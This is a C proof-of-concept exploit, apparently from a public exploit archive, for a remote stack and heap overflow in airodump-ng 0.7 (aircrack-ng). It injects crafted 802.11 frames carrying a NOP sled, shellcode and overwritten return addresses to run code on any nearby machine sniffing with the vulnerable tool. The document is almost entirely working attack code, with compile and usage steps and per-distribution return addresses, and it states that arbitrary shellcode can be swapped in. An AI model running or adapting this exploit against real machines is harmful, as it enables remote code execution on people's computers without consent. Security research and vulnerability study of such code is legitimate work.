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Aircrack-ng 0.7 (specially crafted 802.11 packets) Remote BoF Exploit
===================================================================== Aircrack-ng 0.7 (specially crafted 802.11 packets) Remote BoF Exploit ===================================================================== /** * airodump-exp.c - aircrack/airodump-ng (0.7) remote exploit * * Proof of concept exploit for a stack (and heap) based * overflow in airodump-ng. The vulnerability can be exploited * by transmitting some specially crafted 802.11 packets to * execute arbitrary code on any machines within range * that are sniffing with a vulnerable version of airodump-ng. * * This exploit requires the lorcon 802.11 packet injection * library, see http://802.11ninja.net for details. * * Compiling: * * gcc -o airodump-remote airodump-remote.c -lorcon * * Usage: * * ./airodump-ng <interface> <driver> <channel> <headertype> [return addr] * * Drivers supported by lorcon: * * wlan-ng, hostap, airjack, prism54, madwifing, madwifiold, * rtl8180, rt2570, rt2500, rt73, rt61, zd1211rw * * Header types: * * 0 - None (not tested) * 1 - Fake prism54 header * 2 - Fake radiotap header (not tested) * * Return addresses: * * Backtrack Linux 2 (2.6.20) aircrack-ng 0.7 - 0x8054934 * Gentoo Linux (2.6.16) aircrack-ng 0.7 - 0x8055934 * * Example usage: * * ./airodump-ng wlan0 prism54 11 1 0x8054934 * * Original advisory: http://www.nop-art.net/advisories/airodump-ng.txt * Author: Jonathan So [ jonny [ @ ] nop-art.net ] * * Copyright (C) 2007 Jonathan So */ #include <stdio.h> #include <stdlib.h> #include <tx80211.h> // Linux x86 sys_write shellcode. Any arbitrary shellcode should work // here, it doesn't matter if it contains nulls. Maximum 792 bytes. char shellcode[] = "\xeb\x14" // jmp get_message // start: "\x59\x31\xdb\x31\xd2\xb2" "\x1b" // message length "\x31\xc0\x88\x04\x11" "\xb0\x04\xcd\x80" // sys_write "\xb0\x01\xcd\x80" // sys_exit // get_message: "\xe8\xe7\xff\xff\xff" // call start "Stop sniffing our network!!"; // message text int main(int argc, char **argv) { tx80211_t tx; tx80211_packet_t txp; uint8_t packet[1044]; uint8_t *ppacket; int headertype; unsigned ret_addr = 0x8054934; FILE *fp; if(argc<5) { printf("usage: %s <interface> <driver> <channel> <arptype> [ret_addr]\n", argv[0]); exit(1); } if(argc>5) { ret_addr = strtoul(argv[5], NULL, 16); } headertype = atoi(argv[4]); if ( tx80211_init(&tx, argv[1], tx80211_resolvecard(argv[2])) != TX80211_ENOERR) { fprintf(stderr, "Error initializing driver"); return 1; } if (tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON) != TX80211_ENOERR) { fprintf(stderr, "Error setting inject mode\n"); return 1; } if (tx80211_setchannel(&tx, atoi(argv[3])) < 0) { fprintf(stderr, "Error setting channel\n"); } if (tx80211_open(&tx) < 0) { fprintf(stderr, "Unable to open interface\n"); return 1; } txp.packet = packet; // Fill packet with nops memset(packet, 0x90, sizeof(packet)); switch (headertype) { case 0: // No arptype, just send raw packet ppacket = packet; break; case 1: // Send fake prism header memcpy(packet+4, "\x08\x00\x00\x00", 4); ppacket = packet + 8; break; case 2: // Send fake radiotap header packet[0] = 0; packet[2] = 3; ppacket = packet + 3; break; default: printf("Invalid header type. Valid options are:\n"); printf(" 0 - none\n"); printf(" 1 - prism54\n"); printf(" 2 - radiotap\n"); return 1; } // set some necessary 802.11 header fields ppacket[0] = 0xB0; ppacket[1] = 0; ppacket[24] = 1; ppacket[25] = 0; ppacket[26] = 2; ppacket[27] = 0; txp.plen = 512 + (ppacket - packet); if (tx80211_txpacket(&tx, &txp) < txp.plen) { fprintf(stderr, "Error sending packet 1\n"); return 1; } ppacket[26] = 4; if (tx80211_txpacket(&tx, &txp) < txp.plen) { fprintf(stderr, "Error sending packet 2\n"); return 1; } // Insert shellcode at end of nopsled memcpy(ppacket+(820-sizeof(shellcode)), shellcode, sizeof(shellcode)); // Overwrite some char*, needs to be a valid address memcpy(ppacket+1028, &ret_addr, 4); // Overwrite global variable sk_len, used as argument to memcpy memcpy(ppacket+1032, "\x20\x05\x00\x00", 4); // Return address memcpy(ppacket+820, &ret_addr, 4); ppacket[1] = 0x40; txp.plen = 1036 + + (ppacket - packet); if (tx80211_txpacket(&tx, &txp) < txp.plen) { fprintf(stderr, "Error sending packet 3\n"); return 1; } tx80211_close(&tx); return 0; } # 0day.today [2024-11-15] #